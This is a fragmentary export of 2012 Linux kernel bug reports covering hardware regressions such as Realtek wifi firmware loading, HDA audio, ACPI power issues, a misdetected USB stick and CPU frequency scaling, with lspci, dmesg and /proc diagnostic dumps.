Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: snd_hda_intel Kernel modules: snd-hda-intel 00:14.3 ISA bridge: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 LPC host controller (rev 40) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:14.4 PCI bridge: Advanced Micro Devices [AMD] nee ATI SBx00 PCI to PCI Bridge (rev 40) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop+ ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=04, subordinate=04, sec-latency=64 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- 00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor HyperTransport Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [80] HyperTransport: Host or Secondary Interface Command: WarmRst+ DblEnd- DevNum=0 ChainSide- HostHide+ Slave- &lt;EOCErr- DUL- Link Control: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn+ ExtCTL- 64b- Link Config: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Revision ID: 3.00 Link Frequency: 1.6GHz Link Error: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability: 200MHz+ 300MHz- 400MHz+ 500MHz- 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz+ 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC+ LDTSTOP+ CRCTM- ECTLT- 64bA+ UIDRD- ExtRS- UCnfE- 00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Kernel modules: amd64_edac_mod 00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [f0] Secure device &lt;?&gt; Kernel driver in use: k10temp Kernel modules: k10temp 00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Link Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 01:05.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI RS880M [Mobility Radeon HD 4200 Series] (prog-if 00 [VGA controller]) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at c0000000 (32-bit, prefetchable) [size=256M] Region 1: I/O ports at e000 [size=256] Region 2: Memory at ff500000 (32-bit, non-prefetchable) [size=64K] Region 5: Memory at ff400000 (32-bit, non-prefetchable) [size=1M] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Kernel driver in use: fglrx_pci Kernel modules: fglrx_updates, radeon 02:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01) Subsystem: Realtek Semiconductor Co., Ltd. Device 8184 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at d000 [size=256] Region 2: Memory at ff600000 (64-bit, non-prefetchable) [size=16K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Capabilities: [70] Express (v2) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;64us ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM+ AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis+ DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis+ LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [140 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [160 v1] Device Serial Number 01-91-81-fe-ff-4c-e0-00 Kernel driver in use: rtl8192ce Kernel modules: rtl8192ce 03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 05) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 43 Region 0: I/O ports at c000 [size=256] Region 2: Memory at d0104000 (64-bit, prefetchable) [size=4K] Region 4: Memory at d0100000 (64-bit, prefetchable) [size=16K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 4169 Capabilities: [70] Express (v2) Endpoint, MSI 01 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;64us ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 unlimited, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis+ DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emp</t>
  </si>
  <si>
    <t>Lost Tuba CineBass booster.</t>
  </si>
  <si>
    <t>2012-04-29 22:30 UTC</t>
  </si>
  <si>
    <t>l'enfant terrible</t>
  </si>
  <si>
    <t>I have Acer Aspire 5739g and after upgrade kernel to version 3.3.1 (not sure) sound lost low frequencies. On kernel 3.0.30 all works fine. After viewing the source code, to solve this problem, I wrote a patches (look attachments), they work for my Acer Aspire 5739g with: options snd-hda-intel model=acer-aspire-6530g options snd-hda-intel enable_msi=1 in modprobe.conf and must work for Acer Aspire 6530g. Maybe there's an easier way to get sound to work?</t>
  </si>
  <si>
    <t>Asyncronous firmware loading introduced in 3.3.1 fails on realtek rtl8192cfw.bin (RTL8188CE wifi adapter)</t>
  </si>
  <si>
    <t>3.3.1-3.3.4</t>
  </si>
  <si>
    <t>2012-05-01 12:51 UTC</t>
  </si>
  <si>
    <t>Lucas Treffenstädt</t>
  </si>
  <si>
    <t>2012-08-12 09:33 UTC</t>
  </si>
  <si>
    <t>After updating to the 3.3.1 kernel, my wifi card cannot be used anymore because the firmware loading fails, see dmesg: [ 6.599003] Pid: 812, comm: firmware/rtlwif Not tainted 3.3.1-gentoo #3 [ 6.599005] Call Trace: [ 6.599013] [&lt;ffffffff8102ae06&gt;] warn_slowpath_common+0x7e/0x96 [ 6.599017] [&lt;ffffffff8102ae33&gt;] warn_slowpath_null+0x15/0x17 [ 6.599021] [&lt;ffffffff8147320e&gt;] wiphy_register+0x56/0x3dc [ 6.599027] [&lt;ffffffff810cb8d7&gt;] ? __kmalloc+0xbf/0xcf [ 6.599031] [&lt;ffffffff8148c269&gt;] ieee80211_register_hw+0x37a/0x5a2 [ 6.599035] [&lt;ffffffff81311230&gt;] rtl_fw_cb+0x145/0x1c0 [ 6.599040] [&lt;ffffffff812d1f6f&gt;] ? request_firmware_nowait+0x19d/0x19d [ 6.599044] [&lt;ffffffff812d1fbe&gt;] request_firmware_work_func+0x4f/0x6d [ 6.599048] [&lt;ffffffff810451b7&gt;] kthread+0x86/0x8e [ 6.599053] [&lt;ffffffff814de7f4&gt;] kernel_thread_helper+0x4/0x10 [ 6.599056] [&lt;ffffffff81045131&gt;] ? kthread_freezable_should_stop+0x3e/0x3e [ 6.599060] [&lt;ffffffff814de7f0&gt;] ? gs_change+0xb/0xb [ 6.599062] ---[ end trace 61bc4bb270a47404 ]--- [ 6.599066] rtlwifi:rtl_fw_cb():&lt;0-0&gt; Can't register mac80211 hw I'm using firmware from the rtl_92ce_92se_92de_linux_mac80211_0005.1230.2011 package provided by realtek. The same file works fine in 3.3.0, so I guess this is related to the switch to asyncronous firmware loading in 3.3.1. (see http://www.kernel.org/pub/linux/kernel/v3.0/ChangeLog-3.3.1 ) I'm using the gentoo and bfs patches.</t>
  </si>
  <si>
    <t>Commit 1cc0c998fdf2cb665d625fb565a0d6db5c81c639 breaks turning off nvidia optimus card</t>
  </si>
  <si>
    <t>2012-05-11 01:31 UTC</t>
  </si>
  <si>
    <t>2012-06-05 03:34 UTC</t>
  </si>
  <si>
    <t>The bbswitch kernel module from https://github.com/Bumblebee-Project turns off hybrid optimus nvidia cards when they are not being used. However, after commit 1cc0c998fdf2cb665d625fb565a0d6db5c81c639 (ACPI: Fix D3hot v D3cold confusion) bbswitch can no longer turn off the NVIDIA 540M video card on my Dell XPS15 (L502x). Reverting the commit fixes the problem. http://lists.opensuse.org/opensuse-kernel/2012-05/msg00039.html looks like the same issue on another PC.</t>
  </si>
  <si>
    <t>black screen on sonyvaio vpccw1</t>
  </si>
  <si>
    <t>2012-05-11 17:39 UTC</t>
  </si>
  <si>
    <t>black_painkiller</t>
  </si>
  <si>
    <t>2012-11-13 07:47 UTC</t>
  </si>
  <si>
    <t>https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-nouveau/+bug/984866 I though it was a nouveau problem but they told me it's from ACPI. Also, on 3.3 backlight is reported as software , on 3.4 kernel thinks it is hardware and so nouveau does not enable control over it</t>
  </si>
  <si>
    <t>USB storage device capacity is detected incorrectly and the device is not writeable</t>
  </si>
  <si>
    <t>2012-05-19 09:18 UTC</t>
  </si>
  <si>
    <t>Sturm Flut</t>
  </si>
  <si>
    <t>2012-07-23 18:38 UTC</t>
  </si>
  <si>
    <t>This was found to be an upstream regression, the original bug report can be found on https://bugs.launchpad.net/ubuntu/+source/linux/+bug/997021 . I am having serious problems with an Intenso Rainbow Line 16 GB USB storage device (based on the "Silicon Motion 64MB QDI U2 DISK" chip, id 090c:1000) on my Hewlett-Packard HP Compaq 6710b (Intel Centrino, x86_64) notebook with development kernel 3.4.0-rc6. On kernel 3.2.0 x86_64, older Linux kernels and Windows 7 the device works as expected. The capacity is reported correctly (16 GB) and the raw speed is within manufacturer specifications (~30 Mbyte/s read, 8 Mbyte/s write). On kernel 3.4.0-rc6 x86_64 the device capacity is reported as 18 Exabytes (!) instead of 16 Gigabytes, and I can only read the device, but not write to it. Every write attempt ends in "Device not seekable" and/or "No space left on device": sturmflut@cloud:~/tmp/bug$ sudo dd_rescue /dev/zero /dev/sdb dd_rescue: (warning): output file is not seekable! dd_rescue: (warning): Invalid argument dd_rescue: (warning): Don't use sparse writes for non-seekable output dd_rescue: (info): ipos: 0.0k, opos: 0.0k, xferd: 0.0k errs: 0, errxfer: 0.0k, succxfer: 0.0k +curr.rate: 0kB/s, avg.rate: 0kB/s, avg.load: 0.0% dd_rescue: (warning): write /dev/sdb (0.0k): No space left on device dd_rescue: (warning): assumption rd(65536) == wr(0) failed! dd_rescue: (fatal): write /dev/sdb (64.0k): No space left on device! dd_rescue: (info): Summary for /dev/zero -&gt; /dev/sdb: dd_rescue: (info): ipos: 64.0k, opos: 64.0k, xferd: 64.0k errs: 1, errxfer: 0.0k, succxfer: 0.0k +curr.rate: 178273kB/s, avg.rate: 153846kB/s, avg.load: 0.0% sturmflut@cloud:~/tmp/bug$ sudo fdisk /dev/sdb fdisk: unable to seek on /dev/sdb: Invalid argument Other USB storage devices work as expected.</t>
  </si>
  <si>
    <t>wrong driver for wifi RTL8111/8168B</t>
  </si>
  <si>
    <t>2012-05-21 18:11 UTC</t>
  </si>
  <si>
    <t>Rodrigue Villetard</t>
  </si>
  <si>
    <t>2013-05-29 22:10 UTC</t>
  </si>
  <si>
    <t>Symptoms : Wireless connection ultra slow, but working r8169 module was loaded in modprobe, but r8168 was needed for better performances. lspci lines: 01:00.0 Network controller: Intel Corporation Centrino Advanced-N 6230 (rev 34) 02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 06) OS: ubuntu 12.04 64bit (new install) Hardware: samsung series 5 NP530U3B-A02FR see also : * https://bugs.launchpad.net/ubuntu/+source/linux/+bug/998200 * http://askubuntu.com/questions/96343/internet-unusably-slow-with-realtek-semiconductor-co-ltd-rtl8111-8168b-card * http://amk1.wordpress.com/2009/06/09/realtek-8168-module-issue/ * https://bugzilla.kernel.org/show_bug.cgi?id=14807 Driver I used to get it work : LINUX driver for kernel 2.6.x and 2.4.x (Support x86 and x64) 8.029.00 2012/3/29 @ http://www.realtek.com/downloads/downloadsView.aspx?Langid=1&amp;PNid=13&amp;PFid=5&amp;Level=5&amp;Conn=4&amp;DownTypeID=3&amp;GetDown=false regards Rodrigue</t>
  </si>
  <si>
    <t>After upgrade from 3.3.0 to 3.4.0 I can't wake-up computer with keyboard</t>
  </si>
  <si>
    <t>3.4.0</t>
  </si>
  <si>
    <t>2012-05-22 19:07 UTC</t>
  </si>
  <si>
    <t>2013-02-08 18:07 UTC</t>
  </si>
  <si>
    <t>I use the Asus P8V68-V PRO/GEN3 motherboard. With kernel 3.3.0 I could press any key and the computer would wake-up from S3. Now with kernel 3.4.0 it doesn't wake up anymore. I didn't change anything in the BIOS neither in the system. How can I help you to debug that? Any hints? Thanks.</t>
  </si>
  <si>
    <t>APEI dmesg flood.</t>
  </si>
  <si>
    <t>2012-05-23 14:21 UTC</t>
  </si>
  <si>
    <t>2012-07-26 23:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 73362 [details] kernel log. Hi, on my opterons i see an acpi/apei flood in kernel log: [Firmware Bug]: APEI: Invalid bit width + offset in GAR [0xdfec6110/32/0/1/0] can i fix this h/w problem? can i reduce this flood?</t>
  </si>
  <si>
    <t>[BISECTED, PATCH] CPU stuck at minimum frequency - HP Compaq 6715b</t>
  </si>
  <si>
    <t>2012-05-23 19:35 UTC</t>
  </si>
  <si>
    <t>Suloev Dmitry</t>
  </si>
  <si>
    <t>2013-02-08 18:06 UTC</t>
  </si>
  <si>
    <t>After the release of linux 3.4.0 I've updated the kernel on all my machines. In most of the computer upgrade was successful. However, on my old laptop (HP Compaq 6715b) after the upgrade was just impossible to work. I found that CPU frequency scaling no longer work properly on this machine. After loading the CPU clock is reset to the minimum (800 MHz), and remains so until you reboot. Changing the type of governor is not helping. Recompile the kernel without CPU frequency scaling has been to solve the problem, but even after this performance leaves much to be desired (although, according to /proc/cpuinfo CPU frequency set maximum). In addition to the above-described problems, there is another - the problem with rebooting and shutting down (and possibly also have a problem with s2ram and/or s2disk, but I'm their functionality I have not tested). If you try to shut down or restart the laptop it hangs. Information about my system (according to http://kernel.org/pub/linux/docs/lkml/reporting-bugs.html): /proc/version Linux version 3.4.0 (root@dos) (gcc version 4.6.3 (Gentoo 4.6.3 p1.0, pie-0.5.1) ) #1 SMP PREEMPT Thu May 24 01:02:36 OMST 2012 ver_linux Linux dos 3.4.0 #1 SMP PREEMPT Thu May 24 01:02:36 OMST 2012 x86_64 Mobile AMD Sempron(tm) Processor 3800+ AuthenticAMD GNU/Linux Gnu C 4.6.3 Gnu make 3.82 binutils 2.22 util-linux ./ver_linux: line 23: fdformat: command not found mount support module-init-tools found Linux C Library 2.15 Dynamic linker (ldd) 2.15 Procps UNKNOWN Net-tools 1.60_p20120127084908 Kbd 1.15.3wip Sh-utils 8.17 Modules Loaded aes_generic af_packet btusb bluetooth usbhid b43 mac80211 cfg80211 rng_core ehci_hcd ohci_hcd tg3 usbcore libphy ssb snd_hda_codec_analog sr_mod cdrom usb_common snd_hda_intel snd_hda_codec snd_pcm snd_page_alloc snd_timer snd k8temp hp_accel lis3lv02d input_polldev evdev unix /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 76 model name : Mobile AMD Sempron(tm) Processor 3800+ stepping : 2 cpu MHz : 800.000 cache size : 256 KB fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow up rep_good nopl extd_apicid pni cx16 lahf_lm extapic cr8_legacy bogomips : 1596.02 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc /proc/modules aes_generic 25914 1 - Live 0xffffffffa00e5000 af_packet 25220 2 - Live 0xffffffffa007b000 btusb 10857 0 - Live 0xffffffffa008a000 bluetooth 179115 2 btusb, Live 0xffffffffa021c000 usbhid 18009 0 - Live 0xffffffffa003e000 b43 166907 0 - Live 0xffffffffa0169000 mac80211 197519 1 b43, Live 0xffffffffa0137000 cfg80211 161332 2 b43,mac80211, Live 0xffffffffa010e000 rng_core 3278 1 b43, Live 0xffffffffa000a000 ehci_hcd 39899 0 - Live 0xffffffffa0103000 ohci_hcd 20351 0 - Live 0xffffffffa0012000 tg3 133841 0 - Live 0xffffffffa01cd000 usbcore 124556 4 btusb,usbhid,ehci_hcd,ohci_hcd, Live 0xffffffffa00c5000 libphy 15486 1 tg3, Live 0xffffffffa00c0000 ssb 34730 1 b43, Live 0xffffffffa00b1000 snd_hda_codec_analog 75936 1 - Live 0xffffffffa0098000 sr_mod 13991 0 - Live 0xffffffffa0064000 cdrom 34578 1 sr_mod, Live 0xffffffffa008e000 usb_common 785 1 usbcore, Live 0xffffffffa0008000 snd_hda_intel 21683 0 - Live 0xffffffffa0083000 snd_hda_codec 58276 2 snd_hda_codec_analog,snd_hda_intel, Live 0xffffffffa006b000 snd_pcm 64122 2 snd_hda_intel,snd_hda_codec, Live 0xffffffffa0053000 snd_page_alloc 6609 2 snd_hda_intel,snd_pcm, Live 0xffffffffa004e000 snd_timer 17914 1 snd_pcm, Live 0xffffffffa0045000 snd 52542 5 snd_hda_codec_analog,snd_hda_intel,snd_hda_codec,snd_pcm,snd_timer, Live 0xffffffffa0030000 k8temp 3211 0 - Live 0xffffffffa002c000 hp_accel 16008 0 - Live 0xffffffffa0025000 lis3lv02d 9820 1 hp_accel, Live 0xffffffffa001e000 input_polldev 2498 1 lis3lv02d, Live 0xffffffffa000c000 evdev 9178 6 - Live 0xffffffffa000e000 unix 26105 110 - Live 0xffffffffa0000000 /proc/ioports 0000-0cf7 : PCI Bus 0000:00 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0062-0062 : EC data 0064-0064 : keyboard 0066-0066 : EC cmd 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:14.1 0170-0177 : pata_atiixp 01f0-01f7 : 0000:00:14.1 01f0-01f7 : pata_atiixp 0376-0376 : 0000:00:14.1 0376-0376 : pata_atiixp 03c0-03df : vga+ 03f6-03f6 : 0000:00:14.1 03f6-03f6 : pata_atiixp 040b-040b : pnp 00:09 04d0-04d1 : pnp 00:09 04d6-04d6 : pnp 00:09 0500-053f : pnp 00:09 0c00-0c01 : pnp 00:09 0c14-0c14 : pnp 00:09 0c50-0c51 : pnp 00:09 0c52-0c52 : pnp 00:09 0c6c-0c6c : pnp 00:09 0c6f-0c6f : pnp 00:09 0cd0-0cdf : pnp 00:09 0cf8-0cff : PCI conf1 0d00-ffff : PCI Bus 0000:00 1000-1fff : PCI Bus 0000:02 1000-10ff : PCI CardBus 0000:03 1400-14ff : PCI CardBus 0000:03 2000-3fff : PCI Bus 0000:20 4000-4fff : PCI Bus 0000:01 4000-40ff : 0000:01:05.0 5018-501b : 0000:00:12.0 5018-501b : ahci 5020-502f : 0000:00:12.0 5020-502f : ahci 5040-504f : 0000:00:14.1 5040-504f : pata_atiixp 8000-802f : pnp 00:0b 8000-8003 : ACPI PM1a_EVT_BLK 8004-8005 : ACPI PM1a_CNT_BLK 8008-800b : ACPI PM_TMR 8010-8015 : ACPI CPU throttle 8020-8027 : ACPI GPE0_BLK 8100-811f : pnp 00:0b 8104-8107 : ACPI PM1b_EVT_BLK 8200-820f : 0000:00:14.0 8800-8800 : ACPI PM2_CNT_BLK 9000-9007 : 0000:00:12.0 9000-9007 : ahci 9008-900b : 0000:00:12.0 9008-900b : ahci 9010-9017 : 0000:00:12.0 9010-9017 : ahci /proc/iomem 00000000-0000ffff : reserved 00010000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : PCI Bus 0000:00 000c0000-000cd3ff : Video ROM 000cd400-000cffff : pnp 00:0c 000d0000-000dffff : PCI Bus 0000:00 000e0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-b7faffff : System RAM 01000000-014319b1 : Kernel code 014319b2-0161427f : Kernel data 01686000-01715fff : Kernel bss ac000000-afffffff : GART b7fb0000-b7fc7fff : reserved b7fc8000-b7fe7fb7 : ACPI Non-volatile Storage b7fe7fb8-bfffffff : reserved c0000000-fedfffff : PCI Bus 0000:00 c0000000-c7ffffff : PCI Bus 0000:01 c0000000-c7ffffff : 0000:01:05.0 c8000000-c80fffff : PCI Bus 0000:30 c8000000-c8003fff : 0000:30:00.0 c8000000-c8003fff : 0000:30:00.0 c8100000-c8103fff : 0000:00:14.2 c8100000-c8103fff : ICH HD audio cc000000-cfffffff : PCI Bus 0000:20 d0000000-d00fffff : PCI Bus 0000:10 d0000000-d000ffff : 0000:10:00.0 d0000000-d000ffff : tg3 d0100000-d03fffff : PCI Bus 0000:02 d0100000-d0100fff : 0000:02:04.0 d0101000-d01017ff : 0000:02:04.1 d0400000-d05fffff : PCI Bus 0000:01 d0400000-d040ffff : 0000:01:05.0 d0500000-d05fffff : 0000:01:05.0 d0601000-d0601fff : 0000:00:13.0 d0601000-d0601fff : ohci_hcd d0602000-d0602fff : 0000:00:13.1 d0602000-d0602fff : ohci_hcd d0603000-d0603fff : 0000:00:13.2 d0603000-d0603fff : ohci_hcd d0604000-d0604fff : 0000:00:13.3 d0604000-d0604fff : ohci_hcd d0605000-d0605fff : 0000:00:13.4 d0605000-d0605fff : ohci_hcd d0606000-d06060ff : 0000:00:13.5 d0606000-d06060ff : ehci_hcd d0609000-d06093ff : 0000:00:12.0 d0609000-d06093ff : ahci d4000000-d7ffffff : PCI Bus 0000:02 d4000000-d7ffffff : PCI CardBus 0000:03 d8000000-dbffffff : PCI CardBus 0000:03 e0000000-efffffff : PCI MMCONFIG 0000 [bus 00-ff] e0000000-efffffff : reserved e0000000-efffffff : pnp 00:0b fec00000-fec01fff : reserved fec00000-fec003ff : IOAPIC 0 fed45000-fed8ffff : pnp 00:0b fee00000-fee00fff : Local APIC fee00000-fee00fff : pnp 00:0c fee01000-ffffffff : PCI Bus 0000:00 ffbc0000-ffcbffff : reserved fff00000-ffffffff : reserved fff00000-ffffffff : pnp 00:09 100000000-13fffffff : System RAM lspci -vvv 00:00.0 Host bridge: Advanced Micro Devices [AMD] nee ATI RS690 Host Bridge Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 64 00:01.0 PCI bridge: Advanced Micro Devices [AMD] nee ATI RS690 PCI to PCI Bridge (Internal gfx) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- 